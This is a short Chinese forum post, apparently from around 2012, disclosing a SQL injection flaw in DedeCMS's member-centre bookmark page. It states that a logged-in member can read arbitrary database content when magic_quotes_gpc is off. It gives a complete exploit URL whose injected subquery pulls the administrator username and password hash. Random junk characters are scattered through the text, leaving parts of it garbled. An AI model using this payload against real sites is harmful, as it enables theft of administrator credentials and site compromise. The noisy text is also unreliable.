DedeCMS会员中心SQL注射漏洞
; ]; ]0 b# y$ n' ^* ~* G需要magic_quotes_gpc = Off
, |. _$ ?: @1 _' {% O会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
, X$ m" l3 x; N3 @# n \ * O; O$ q) V, h+ j8 f
DedeCMS会员中心书签管理SQL注射漏洞
, m: y* Z Q/ V+ ?( }成功利用该漏洞可获得管理员密码1 e9 u4 n/ `6 W8 {0 B2 e. W, A$ X2 g
9 U& F" h. i( O会员登录后可以执行SQL语句查询数据库任意内容如管理员密码" W+ x( W& M7 E, f8 }
# R2 c) v( r' L" `http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r1 V( K2 C" V8 D2 A
|
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59